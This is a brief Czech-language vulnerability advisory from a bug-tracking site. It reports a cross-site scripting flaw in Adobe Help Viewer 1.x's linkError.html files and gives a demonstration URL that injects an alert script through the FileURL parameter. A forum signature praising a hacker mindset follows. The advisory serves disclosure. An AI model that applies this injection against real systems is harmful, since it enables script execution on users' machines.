Adobe Help Viewer 1.x (XSS)
BugTrack
Adobe Help Viewer 1.x (XSS) | # |
| Soubory linkError.html v podadresářích jednotlivých jazyků v adresáři C:/Program Files/Adobe/Adobe Help Viewer/1.1/Resources/xx/ umožňují spuštění skriptů v kontextu lokálního systému.
Demonstrace:
file://C:/Program%20Files/Adobe/Adobe%20Hel p%20Viewer/1.1/Resources/cs/linkError.html? FileURL=%3Cscript%3Ealert%28%22XSS%22%29%3C /script%3E
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|